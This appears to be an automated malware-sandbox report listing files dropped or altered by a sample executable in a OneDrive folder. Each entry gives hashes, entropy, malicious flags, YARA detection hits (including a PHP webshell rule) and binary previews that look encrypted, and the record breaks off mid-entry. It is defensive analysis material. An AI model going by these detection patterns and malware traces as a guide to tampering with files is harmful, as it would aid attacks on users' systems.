Reputation:	unknown
Preview:	.PNG..vz........'..G....!.]k.3.v.KK......=......).(h..uhI...O.{.f./-.o..~P..?y.....[...e.....FQgS7. }..../.zx3.1#....=...V...{...^".....%..M:k.G.^...s?.JEWj@M.0.A.4J.O.x..%V@#......T&&..E#..j....y.(..a....f7.~.y"c$..fa.6..Ny...LV. .......o}...Cq....]<..R................Q....4...!c.F...3.....`.....O..".?.....{./.j{.....</...\|7jdg.(.@5.wB....<.ME.... .".41...^Y......q{..V.F..w...Kc.T....d~.a..nw.1.V...B.l...ZK.X/.%].r7.O~..`-....t.......MM...2T.y*.......1J..t.s.{bl......M...L.ui;.p.I?......v.D.:-GXJ.K...Y.Ko4.B..............T\.R.8..}.H........\1.N^...k....1.....}.\|..d~.....v9.:.NX9.=.I4....u...G.>f2...X.E.. .A32....\|..r3.u.-1.I...U!\|..%.5........'...%.f.X...{......0.}......W.....&.n..U.J..F.y%.X.C...g..Y...?@......$..Qt+.P.o....D..#.......M.;.~..u..T.J.93F.. '.........(.J....#t....g..:)w5.b..\|H!X.).........W..L..W.".(b.......la+.<...'[.H.......o..a...&.........[.Y]m.X90`-.....N...r0,6.0.r.+.k.C&n..jz.....].w...z.&4.s.$"..N..._.gK.2..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\QuotaNearing.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4158
Entropy (8bit):	7.953892523911852
Encrypted:	false
SSDEEP:	96:C3q5RPZKRLZU80pGBzuqP5sNnOht6BqyzAYCJflbHSB:C3QRPV80YBzuqP5sNnW6BqMAzlBHu
MD5:	27E3348AE02E3C4C88AF3BB492599B21
SHA1:	7FD9C0A6D5AE39DDB1231462B7D726D2F305E09C
SHA-256:	F3415E3AD232ACC9882E8421CAE3A878C9217B19C30A03A3CF2E2820F53C855A
SHA-512:	9FF09F3A503EA1B56DCB395276817E0F96943035A4D7B47839F2FAE3F7715AE69CADE6FA7AFAFAC5613A892370338656ED7CB34CE385FC86C0DBF6DD6C5F88C0
Malicious:	false
Reputation:	unknown
Preview:	.PNG...v..Vj...2.d.Mf...v.......z@[pX.......A.L..:EY.&.P.GS{.}......)ET......1.A}..7.R.\|.p{..q.y..."xX.S.s..+F.]u.j.}2..w......8s.._......z....I..e..XM..{.....TmO....]..y..e@...{..c..wWso..l.j.u.....Y.s....(.1...&...\|..9Z..L.).....vU...]g..cz..~. .YU.Lu.y.......d(.`...s....t..`g.v..Dn.r-...B...G...C..c.T..$1..z....y3....St.:?....0!.\|.....G.t.^..q.%3..eEZ.H... ..Z.....c3...IX.t.....9..;.....Ns.K..#..sx..Q.C.z..q.s..:......~.?0R.'....CpU.\|.uE....BQ1i..g..z\......r... .06.....3..3[.5h..]........8....../)..L......... ...4..2...^>.4DP J..1..n.r.J2Z..M..ZI..n.)M....1..i Z..j.".m......X..g.x[b..b..t..d.c<...0.=c..B1........!=.T^..........R...3~)....w!..*.....{....x.............9...L6..s.A.].5....,...../....F...%..%!...T....j@.4........vL.V....... K.._..>.~.6.5.S.........Pu=.%tq...\9iD..%..".q.1x..m.g...89M.-.]je..; m"..A....&..=R.)X..>..F..Jt..t.J...1.):`.7.%k3<t..X..hbW.%.S..W8\.{..@$..rq.g....d...Jl....T..e...Q@v..a%./...K..5SN..A>.12.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\Resources.pri

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4750
Entropy (8bit):	7.960760929899719
Encrypted:	false
SSDEEP:	96:WaB2lnrjhbLHJPYjinZGxNO/Gfqoi/DkXJiT3PFBuP:W3rJzdys0oWZWDk4T98
MD5:	F8221D645372200EF8A2E8AD528B6945
SHA1:	B78E271E35915F21F8BC5E9FDC8D675D5C334723
SHA-256:	38A8C16C43C09BB89E310EB91126F7E0E36BB8A66835F8385B79CCF02926966D
SHA-512:	1E5DC3DF32259D9940CF1673BEF649A6EE9C4F2C45B1AA5FFAB51BE4C1A22627178301210FC5EFDDD52ED3C299A1EB89E2400B043FDA8B45DE289FE146287AD7
Malicious:	false
Reputation:	unknown
Preview:	mrm_p.k.-..ign.5.......%V..W..T.%..%..&......./c;...2........8h.M..`t).s...u.`.%...d+..d\g.._=.m....H.....Y...........li....^.s...5..........2.......#O.......11!suQ....w.%s.b....k."..E..q..d...G...!.._k.h.X"..a.J?d.m.C,......)......W.c. ).k.f=I...H)7g..TB.N.)30...........'...y@....4......8.Bf..F..Sv.wTV.1.c..zB.s.....Q...W.B..\......u..'w.H...t....&f..x..7. ....[..x;.Q...r.6.vQ...`.......<3.[......e..r.......y...0.c..Uw......cN..\|...:..#.^..Z...f..Q...92...yZq...L..o..[..{\...\|.u....=.4.e..6..i..R.....^>9./..e.....\|Ukj.N[..&...V...D......j64.J...0t.....M.CZ)..+p.d..... .bz..(.W.A.C....Z..l..{..<v.UN>..F.Z._...j".s..2+w.....ED.2...$k}..D......{4..a..4C.q..i.e2.u.....9~..i..C&ai..:)n.....\|..8.p..z>...FO.........I.....'.."...#..x...uz...`..........4A..\|..'.....1.U1...)...h0....$..?y.....b...-.E.v5.sB..6.e0/...e.U.b..L4y.sS.O>\.....&.a..B)..<#p....v"..\|..8..d......6....F...8.D!8...i...$.#.......e....S.g$w...V\.5....3.Q.....4.....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\SaveApplicationEventLogs.wsf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1827
Entropy (8bit):	7.885110763143544
Encrypted:	false
SSDEEP:	48:f0eRgh6oeejy/7h2mJfiBm7luu6MI7DUgD:ceRc6oZSIBm7luuu7DU8
MD5:	0054BCEBB45C1C01B9F0A50684872322
SHA1:	34ACA3033832B16516FC87C61AC8EF311E6162E7
SHA-256:	D5196F2B8B7B61721F0951A692BC5869E5B51ACAC570330C07322A9202D70562
SHA-512:	2A30FF57F6229DCD9402E7010FC5EEFB7729C103789C066AC5778458260C9A1BD9AF60528889A2010B5D8428479F6482F632F852C35294A31F6F40B73531678F
Malicious:	false
Reputation:	unknown
Preview:	<job>........&IQ.e.j.W(I+.I.L...1].........1..Fx.?XuBp...w.6.Q..N...y.K\Of.i......a..;E..\|.'^...X../1.d?y..%).B..ly..7....X6.#. ..PN...t.t....X.j.%p.B.W.n........R"!^.Gq....:....\k_!....2...P.)m@}.Q.q.......f.............z...m...O....>..+\|..ZD..9.o..W..YB\|_p....b......NH.J.s...-..C..ML......jN.]......U=..t..?+..g..n`...s2ms..f.$_.8<..Oo......'......8`6.yf.N!............b..<YU..g@t..X;+.@.z...\\.5.p..\|OpDhr..+...8..hK.).-M.vo.=.j....;W...y<i..{...f....g...N.{....yo.L............7...yw.1....S.&....w.....Z;A........n....%....P<.N.+D.`.)v..~.9.../..eFE...O..6.2RN..NT<3.ik.....Y>C..1s..,.V....+[..R..D0}...]..$.(.$...Q...2..LFh%tLs..3Y.......w \.....s.,..{.;T..dn...H.=.c.v>.{;R.K...c......x....N..\5......2f[L..B...b...m. O$.n.6.S..:...A.9...03.4.j\|2J.?.X..z..\|g...f..[.....h.sD...o...9.f%...>..yo/.b'...G.u......0..Ft..3...\.p9Ed.eY....(..Xa.......%9.%..KW.Y5J5...w....>.E.R.. .m...C.E.-.sr..j..e.\.n.>{..m..+........GQ.+{..o...oS.....Z.I...bL...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ScreenshotOptIn.gif

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	GIF image data 8837
Category:	dropped
Size (bytes):	243823
Entropy (8bit):	7.9817627491627166
Encrypted:	false
SSDEEP:	6144:uFCiK7eiS+5Mlc6LuVyRmh13/Z0cI6j+Ve53dqtkD:uFp8p6LmyU3/Z06jxdqta
MD5:	C8C7B7E8EE4FC030F0192FE666CD6A7E
SHA1:	1CD744C6FD1B7DFF0467811FE09E02BD7ECE4BCF
SHA-256:	494E3472B6B22E2FA4F0F2B06F66F788B9F1EDF26C6F6C7F01A3CE9B1DBF6A4B
SHA-512:	6F6C64748A911A405CC2BF222F841F74B130C24B82B5DB3B1D9D9C465F091EB0D842866C8194CCFFCA8A1DA1A52F296A9730270C36FAC2D73D83C761A694ADE0
Malicious:	false
Yara Hits:	Rule: SUSP_GIF_Anomalies, Description: Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ScreenshotOptIn.gif, Author: Florian Roth
Reputation:	unknown
Preview:	GIF89.[.."n..E.c.@.......P...4.JY....Q.\|......}.=/b...GxY!C[.$1e..V...>+.,.......kn.....^Be=...Aylu...k.&..m-6z.d.>g..Mk..[....:o.....@../.;.q6...b,XQ..i`.M.a...q.].'.4M...../.....z_?>.;Lc9..5..^~........$......M...M.......;.._'f..g\|..+.6......^..[.Q....h{.G:..Zu...8.5.+qs.H....wa...%..?..>.h.S...W....~..g..4............2..!...-y...O...@.r.O.6n..p.nQ..<..E.._..W\Z..F...r...f.w(....3...b.......E3Y.'Kw.....J..+.EO.~..<".!9f.k......:%..j.R...&...T..pRu..%C.;&...._S.....BF$....x......H,P.-t....&..R\.C.....Z.....e....p.0&.......8./."..>.0..8....e,Q,Nm.1.....'...hh.5...+..ov.......7.p...W.C....D....Po.AQ...q..O.BRm.#..K..X.zlG.{...vky)\.Uh..+.3.o..0W.1.<.J.v...ms...n.A........u.C.N..B~)=..X......}....\.i.gE.......;7P52b\|3.V....F....p.J.......c.'.0..r...h.M........o.6Ut..v.....?8.y.....7M.....9df6..u^.&R.K.).I.H._E..h...L...}.....R(..P..N.%.O..0..S.OD../...R...\|........._;.Z.L.r...TY$.,..V.........<.hg.".)..{.j...:......s..blk.[tAy....-...BJ.p

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\TestSharePage.html

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.866370462094926
Encrypted:	false
SSDEEP:	24:YBI2Vr8u3SYuyH8ctwb4vXNbO/VldgtdthAVoCnCE/gq8Pyqxf7VDEXFiuWGcA/X:YBrrFSTycYpwdoQCe6NxDEVZWGzjD
MD5:	03DD850481537E07A6658779B15C5F4C
SHA1:	C06961DA410E05F97B14E8AC6CCFB97CCCD288D4
SHA-256:	499A9C52F18773D4E7D9759A319E743CCE39BF3CF541925BD3D3745228434A90
SHA-512:	569EF0261ACBE330C772B0347561CADA7581EE1B91ACDE209B8744FDF1F7839FC407D63FEDDD6E2B73A57DFB191CFB5C309D23D6C65CBE9FF95C2F16790053CF
Malicious:	false
Reputation:	unknown
Preview:	<!doc^..?8.)..?:=...).<gb.Z...)...'7........D...%>.n.$....Y.Oyu..n....b..t...1...s/o.U..S.q....,..x..d..I.j4......T.....qn.{..PGY...`)...8.s.AR}.md.C....L~......}...M...o.K...\|Q.....j...1.~...P..%L..U.v......;....4C.P...]Z]@....~.}.I.'.\|..&..4u...3....CM..G...}4=.T42.0.).\|.wR$....wZ.L..]5...Is.....;...M..L.8+..{. ......Z...1./..[..}.. .K.....@..6fL..zAL+.....1......J..F{O}...m\..T.(~.TZ..5j.^........c..r..U4K.`iP......+qjB.M.;.{O..O-..i..._7..6..ip.......O$w.w......l_+.....;......D .].J.oe..e..v............0:.V....>..V...cL&.......>..L'Q.An...dO......)....d...zbz9.#DG.O..'%...2".{..w{^.....p4#/e...._..@.......Rb...8.....t....Q..v.X.uL./-MlE..*j.V{....Kn........M.Z...#.)4'^4J#.bz.&.+z......l...U..m...c..-.6.J@H<T+O..v$z@2....=.0...]....2...y..2.+..Q!&.Yc...>(D:.y..`2.^...D..N....=}.V.k}..p........c.,....K\..l....n.....4:....1..(..Ly....^.....,..)....`R......>Z1J...J6.&..@7n.N.5t..=NV'......e............S.2.....B....p..8...f....:...F

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ThirdPartyNotices.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	49463
Entropy (8bit):	7.99590032892925
Encrypted:	true
SSDEEP:	768:nkHRoPNOgjjAaXsKdfOOfIteANTnuKOEY1/M3If4Er8G+/a2xi0nOnQ:nkHqPNOmJf3Ita9EY23mhKGQ
MD5:	B12E3A915519D408D918DCDEA7ED8355
SHA1:	628F141233F5E96AD29B08A9EC1DC66535D971F5
SHA-256:	E9516FF34567B7FAAA2C86FFC95CD1078B8401873CDF79FA459B9C5A08C5C677
SHA-512:	393F51E9B802B28089B3008485566599F0E0C47850A0C485F0F262D856733B2E0C4D5DA6B70CA586EE0A532F05455406079D67DA601685F36EDBA87EE4D5F362
Malicious:	true
Reputation:	unknown
Preview:	.THm........A.9..q..d..d.X@Wr.!D...<...2....F.q...@]........`...JV.'.3.&....:9.>.\|....Ws.s;.D..e....a.U.....,.........T....e.... H`. ..b....s.i..b...:.....%.O(/LC.t4.t.-fq.7O..P.9-8........e.\|.....It...%.:..s..;.N.m..4e....E%W9.....l..P.k}..:.^...P...j..I.OUrDY.e.P.op%Q.B....b....PT.z6p..U..I+.[..)......]\....P"..L..]t..@m...:H...(L.i{A.N...+.w.&.1....9G...;.tV.%..,}..<EZFhV&....B..7.[..q3.......T.../......0..v....~N^...R...X<c..W.(....,CS.w.U~...f...3.B..3....3t..T.0.#v.p..>g.}.H0s..G..ujt...\|..Y...:.Vu.......N8.+e}"u.(...ZPKA..9!.Z..5.....h......4....f5=5d.U..,..!..ON...S..=..@...wp./^ZNCpG.f{.I!..._.E9S...mFs......~..;.1.......%B\.Z;..E:Fh.2.......$m..D..`.P.c....7....N...;.....A...+.&>...T[4%...b\...w.7...B..!A.,.....0.g..+..d...j....X........%...s..}2n..M=..A....o"....N..a....C.....i`$......).@....OER......{....e}.Z.]s.";..p..f.(.~.u%G.89\..0....~.=.....Z!..'+.B........;....9......P...^..w.....6!.R"R.....././.8.*.....d..;..@..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\Warning.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2927
Entropy (8bit):	7.930760695081802
Encrypted:	false
SSDEEP:	48:D0V8yW5j82chYraolCNppcvcioQjzAQEhIjILR4fS+zD4A8ibY3bliJ6TD:y1W5AthYUppcvljE5hOw4/7hAig/
MD5:	759B8F9F8679F7D637FA5CF2D0AF0A67
SHA1:	0454D224B702EFF7F57C84C62F79A54CBDD54F66
SHA-256:	C803A3EBB3D5D37C649600D8289799112F4B654E870A0E8B28FECE590EE35A27
SHA-512:	21DC104E51708FB9C8D0EEA85EF54EDD1A772A537A54429B2A916A4A7C2417CE3B18424C5F8C4C85C68E520C3888E7384A97FAABCBFF40198A5C8F92CAC1B53B
Malicious:	false
Reputation:	unknown
Preview:	.PNG....+...0.Vy.u./.Z!.8.E..^}.-.).](...6M..z0.g%..5.".t......R....7g...L.7...Y..k.&hg..[q..t.......O@.S0.c.y...z..@@.j.....O).}G...2p.d.%4.U....1.2.4.....E.'R..k~.........M.&.@..3..:.Ea..e.....W.&....+Z...c2.K...#e)....s.....W.b..!..v.!b.Us!o..Y..+..(.X...4.......C.^....u..4.R...&...Z...r$..?..<.;...(.".\|....-u..YBSt.x.7.D.......kf-z.I...'.i9......~r....u.I..4.....N}.H.....19.....0....C......^..u..[.F...x....T.I.72..T[...u.........J....3....F....Jt....9<....]-#.\|.1;......8....S8..2.{.q....<.........~w...'.P.....S......[.}..Gm.......7...ua...t`!w.'a......=.....R>.%.S.2..#....LKzQ..w..,...K.....@.N..bl..qq8...mC.\|..%..L.w.$.....,B...l@.C.CQ......w.`.1pP(m..i..K.X...K3..So.)C.w.....\..........qu..t.J8.h...0{.nNt.....s.J.b...Ubs...-.cKE)...V.B.7t..h..M..U1...3D....d.ew...~d$.wwA...v.G.#..mbO.....6.5.d.;...W..Ie ...(0..".5........f...ReC...........*.......wo.........hi.Jm...........z.X..g&/(.]5..y..]3d...wM.i...3J.4j%.2..!..6..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	35863
Entropy (8bit):	7.994714326340198
Encrypted:	true
SSDEEP:	768:67TkBtAyTDrSvhy3E0l0LhIXH/8PIVWEPYIfUH8X653:pBeyTfEkVl0LhC/VWVwq53
MD5:	AD5E0CE784CA6AC25E43FC82BE25C3F1
SHA1:	7588012F2152D05D7E3917EAD179C954B87FAE08
SHA-256:	D3DE287D46545DBEB4A498329BEC6EBFDE3E163FD948D5002F8640F1BC3EF003
SHA-512:	FD63E6C370002A56F06032D47F9F44E1F514CA4AE9BEC90D3243E597719395BC59664238952F7C4D6C08958972EF1289FCE131DE1359BFB019130401150678E6
Malicious:	true
Yara Hits:	Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.adml, Author: Arnim Rupp
Reputation:	unknown
Preview:	.<?..i......\|;........fP..Q^.k.MA!7..~.]\|4.^...j. m ..<....K........^u...t.....][..u<Q..w..^R.....I.)G......>.9?1..l...;5hj..W}g.7NP.v....<...9..;.\......W......@.)..=..U.eo......\|..@.......8....H..ib...-i...Bt.F........&5...........o.E.....ie......d.Zz..\|6,.S.......kBY..N..a. ...FI.9.].8u6..\..6<.aN.66x_..d..O.F;...k'./y 1SF"......\...h.=...6B.-..u.H.....9v..(6k/...Id.4.e...?..G...c(.....&.E@o.x..[.I...f..........Y......S8./)9X..N..H.X.P...5..k..kg.....'..[.>.....B..j\|vO..lu.pj...L!H6M..$.w....-w8.X.1tA......pd....).)7^..]..T...f ........C.E........T.^.).L.....q.[Gy..Z.......P[.Wi..#..+..0.)I.p......tT.......F.....A!.a.T....L..1.5G..d.Q.r..A...s..P..'./.l...#.....(......o........e....4..e_...+....")..'O...q!..C.Y......b...-+.N.).K..P...D.<"...u.....8....Y[...8...Y.....#o.8)..1O...W][$ZQ..V.46..Q....(.........v.1n:4...L./=$i0.~..4....I.h..........w.+.8.6.+.@vm......e...4x.&HN....v.].F...h.4...6.T...:..I.>..2[..............

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.admx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18306
Entropy (8bit):	7.989954259364736
Encrypted:	false
SSDEEP:	384:uiLgYyZxsiSTfBqsW8AP57YGHblbJIMrnhz3iTwhgUKjYOKo7Sh:RLOwTksWxZFhdVhz3iTAGYN/h
MD5:	AA1785B556B4D8598AC72E53E232E31E
SHA1:	62FB325E7E82D5B3426AA2E0B6E168285BDE20BA
SHA-256:	9FBA978E8B40B4E50F36EFC4019435D4B9D3A4F77A554188227571F1004DF202
SHA-512:	B24B1192008F465D7267DE3E1062EECD511146E7923F785313FAA42306DCF7DD48964C46A509CD1F1E2BF5D97901A566809FF5F37F9929ABB1096A144D6646FD
Malicious:	false
Reputation:	unknown
Preview:	<?xml...A..gh......&..<.ZT0=..[.#T.h~m..L..E..;.......@.Zp...M......A..`....w.y.`.EW...f.....+..u..zC. ..l...<,\|.m..6.o...e..1.u..:zMeu ..oI..q ......y.....v.]...hQ......1.........\.\|Q..A.@....6.jN..GUO]..M.1....O.2...RC..Ha....R....i..+....5Bt..H...d..d.{..!...2IX...pI.}d.N..z#q.......D...\|..4..e.>..C.].8(.."......0...vUu<..#p.aK7).+.7....r. ..[....}....R8..\|l-a....M%....;..a..hv.....wmt`.`:.....>Hs.K?....3.a......[d7..U.j)......,.8....Z......V.......7d.l.m..aJF..f..5..N.K..0.Q8x..8dT.+.."R..J .W...}..n.\|..0..H,.j...^....bf=.Y...2D}.z.....)%.LF...q....2gy.s5..>5..+ScY.D..Q.I~.....v......'.W-.7+Vw.+...1...5."L....b.....)\|.c.C..3...bp..m1.8.,..v...![........d..>..v*.l.S.....t....k]...D.8w......5.%.j..},^W..`.......}9...........N1.$.......".Ju..}.j.gf.u..g....S..S...=...;..>W.":.$........sCG...u...8..N..']BE.l./....T.,.E.......7,.}).xw.6%.g h...H............g..AP..N/......x..y..C.'.....\|...v. ...JQ...H_.u`H.6.%#)}kyD....W.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\de\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	43330
Entropy (8bit):	7.995566202415858
Encrypted:	true
SSDEEP:	768:yCXHxNdIs0CCwNJ8G6R89ku+GTh/Nqs3pfjtfoL5vo1abnWsBQnByKcXh:zXH6sfJoAD3pbtALGOWs8ByKcXh
MD5:	9B63997E714FA0B649B6EC5C742028C2
SHA1:	BC412BB3D4586F4CB030E711EC6D56EEB384B82D
SHA-256:	BE14E5518422B93402BE04D9C8848A8A395E5034108B74A9551DCF835917871A
SHA-512:	57C9A7319CE7C1373B8E050C6179B7D5F7A92A66E89DD1CF4368F75A965B5DACEB7B4FE82CA03652061449C1E00F68995AA9C990403EFE42CBC90555571A0725
Malicious:	true
Reputation:	unknown
Preview:	<?xml..z.r...m3.!.%..u...M.}....;.E.H.<."...b...8X.W....o...D...>~..z)...H....L...Y....3L\.X..{.P'.d./....ys.....V.%.y.@.5.7L"e..;T......9....(.(K..AY..$.<+.v.\|..x.].....3..0gP.E.......P.'W.tR.z.l.Z..oZx.....Ci....RQr5!....Q....W.C{..9..b>~.H.....v..-X.S..O..HC..'u.n.%!5.yQ<N{.+...b........>..+G}.`...Ug..s....W..E...@.+xJ....+...7........z..p1..<0'AT...>..e..Z.D.....q..........nf`..........k..h\|%.b.}.'f...."..)...6G=..f..6.P.?m..g<.Y\b."....jY...S%$.J]..+....~4GM..or3..w..c...!...I.....fC....J}.v.....>L-....X........i.Z..Z.saE.b..b..wV....Q.K..0T0.........R..../{BN>'I...ez...d..S...e.N.;\|...G.9k.C]..:.^/F..b....G..Xz.gyQ.j.....3a.)..zW...gt.....m]./...D..3.....1....g.Yl....c..yO.{...Af........7 .3+w.K.r.....p..U....f.WfUT+h...y.9\...."..<b.V......I....S.L.....s.T..,...'(zmJ@....=....'6.3;......t..t9&....ms.;...w.c.o.V."N.>..pV1...<q2.J7_.qJ...4........7#.[_...p/.._5?..j]...>...+.5....<..{.$..........CK)....eI.F.".3....f..0y.c>..&9.c...&...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\es\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	42813
Entropy (8bit):	7.995974101458552
Encrypted:	true
SSDEEP:	768:pehzRp2DrJEitx8LwswOLPHoMH/Nl1COZh1rO+DOYllJQKFHKVP:EfpomtksJlVp3ZrD/TQK5KVP
MD5:	DA922B0B32C31DB261E070B023447803
SHA1:	A5DEF8633336E75748ADA8893384EF5DDF4D6FC4
SHA-256:	356E131FBFBEBBB485220E177A9A13ED714EB7D425B08B111F471849CC4EBB22
SHA-512:	48F7622F9BCC25E83DF2C6DDAE48CB18BE400695254AAF81FD0FA3414B753A9C7832CE5C4F63E209B18F59A985FA46DB20677A74D7F06037CBCA0266D8554153
Malicious:	true
Reputation:	unknown
Preview:	<?xml.3.r..Z.+....a8..L...f..Ga.x..O@.cz....{..xW\.........[.nG......H.....G.n.6..pZ..k.L.....a....T.Q.y...9......F0.\5.t.p..oB...eP.0l....xn.x..O....8.s..H..2...F...0Q.P.s...t.%x..I.F.P..}Z.q..1.....KT....#12$nV~\.e.T..bO..9.V6...$e...".M.W.4..q...[.k~+M.q.1.S.sJ..o....w>u.9..rWY..:N:...S..Bu."F...v.......~.D{."K..u.XO,W8C.C.#...?{..]i>.f?..E....;Y9....o.n.W.e.N..q...dA....G...\|.)pQ.". ...wT:..J.....~...fF......j.....h.0...GEl.35.oZ%.....h..Zw.1..D.u.~8..&{\..i.J...,0.._YL./C..&,...])_.}V.D.@..%...H..E..6m..8.bl..!$X_X..Y..P.9..!..'....\Z..\a .7..NNJx.__G...8.L.]..:......I_1..]i.nA.$B614.R.=.7...*........0>(......b..l.L......$?...._.^8..\.....2nqM.r..Um.....u....B..._E.\~...,U..#.H.%..\y4.~.x......U..>..ws..+Y..Q$.....\|..M...=...k.R..........,..w$)ui.........6...s.M...=a...O..s.A..V.0[.........C..T...s..u.Q.U`.....3D.C..5.otL....L..@....v.F,.X..L..P.;.J.....M.H.TW........B...u..g.0K.."...I..2c.cM<v%.......G."...N.....d.......l.l..pUs..J

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\fr\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	45019
Entropy (8bit):	7.995998386649718
Encrypted:	true
SSDEEP:	768:nipkmDKgmONa9o8+G2RAWHc5HVY02UQ0HmH+BeskkY8ysCybGKEZsCd5rkJIIb6g:GkmWIa9I1aW0FQSkUPyTKEZL3rkPbR
MD5:	8FB21EDDCD906646863D144E5457972D
SHA1:	37C811E54C092E739F86940BF662646EC8F97C53
SHA-256:	A6C3408BC6B4ABF5B330FB7A983BF69363A19170112D7B051574E9644AF0A617
SHA-512:	1F38694E138BD4DDFC7D770DB5F2B18F86F8A699BBDD9497C1B7F475AA1DEDFF67B61D3C4B930F4A8D6E648EADA96D0D13A4980D5F19FCAA6E3D411E4A7449C8
Malicious:	true
Reputation:	unknown
Preview:	<?xml...>...P$.\|....4.0p...w>,c/-N...z$..M...m.L&..RBK......n....].....lu~.X.5s-..=y.<.......`-.....a<.e.No..h..5L.....3_.8.......&..x.0....$.At_a.!..w.c...Q.?...P.^w...J[.u ...r....L.............($...u.3):.YC...[B...+....%%......I.p,...M.....O..1....o.6b..s&..!.......w#.\.+7..#.(.B.WL...........CTk.~.. .@.."l_v.BK....]..7H..K.b.a..t...A...R.`..D..\|....c.-.(.b..XD.....W[!1g.w.}.gB]...!..3...Gi.B..d....`. b.]E.F...$[y..i.6...5...Y..E..]5...fS.oG_.......Ac.....;...@........S..........Xv'....K...Fy.....q.=bo.....9..rb.4....QT....E.%.pD..[\..!.......O......(...Z..?...*~r........Q..Vj.<.z..C...J.:G.$...K..\|i.M...Zp..NM7.._.O.._...]Kyt-=5\ d......o....C:l.......#@s..J.!$.....+.N...Ly.<.8.#...2....N..M.S..&..m..'.......\..,'=.Y.L.~...~.l.`@x.c..m.M.a.L.6.z}'1s?..R-.r..pa.y..^..}............{..Q...E].,..(..G.....7.2{..N!Y...m.(.6+2....b]\UQ.!#.X...6e.q'?dA/.N\|.K(.4.d...N.......0..,..e.4.d....9..bD..ly...=..K.. .2...p4......ocE.......#..B....GMP

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\hu\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	44268
Entropy (8bit):	7.996038392711252
Encrypted:	true
SSDEEP:	768:Qx4lPVeOSdvvMl32ALGoKdJMdxMPZDRQTjWjKqvJyJi37bkQOchk3:QmP8FvMlmxoKLKxMBD6TjAvwJ4/rhq
MD5:	2421262DD84CFADF41167D21749BCCCB
SHA1:	6DAF9A86CB78E7FD56236D32BEDD3D253354E74B
SHA-256:	3BC504089DA0417B136E5BF93CB375D78AC80DCCE40621011FB43AB7A818A5FA
SHA-512:	0947DFF4233EBD367F9AFBC92FE63F79673978447EF66CC70467FD267756DBFF380FC8C22258EBCE9E2DA4AA6CBC06EA5A85CF839E1EB5EB04DBDC7B57A552A6
Malicious:	true
Reputation:	unknown
Preview:	<?xml..\..w..H[L..O..@..:.J.T..E($..aEc'm....S......:K.ZK..P...?.`?#s..H.H.]O.GV..7...._.@..Lt!.S.[....6..pVS......j)d!q.m..^.q.].5...2u.....Y....a.{.;\|.Y..n.`6...U..P..X..A......a'.(...\|tAlN....S..F.N..r..O...r...N\|...Z...3.j-...76....]...7G.l&b.x1X..Q....)..i.....8.p...\|P..^....oG..P...{.\..c...7q$Z.u....t.O..........).H..........p.....L9..D...i{.aY..4.....-.{..O...]qy..4.. ..;s....}.B#...uX...+6..L.}_io}.7.f...Bq.q.(~$3...#..\|........6.Md...a(.....<j<.g...W..h.vd.q..I.}..o.)....v..T.."...1,...&.C%...$.T.\..Eg..WWI ...s.).i.......eSU.....K8.ag...n8..s?1..\.".....h[#....Mlo;....u..15.$.78H.....N...3&.0....3..W.... ....A.. ...W).....gQ....V....ZDR...j...W"...'.D....<{...].>6.Z3...f....\Y.?....6E...)...L&.N......:.S-Fb<...k.K..}#...&....m....D.a........f.Gn..mI...^.........#q..w..N...XC'.a.~!..Y......o..E.C...7~d[..i.....3..e...4.....f.[k..7...#.;...Uq..#.J.g..p..8.j..A)...S......`. ...\|.4".(......QMY'.+ .....Fe,..)..^.7D.r.!z.p..q.4

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\it\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	42774
Entropy (8bit):	7.995752398251768
Encrypted:	true
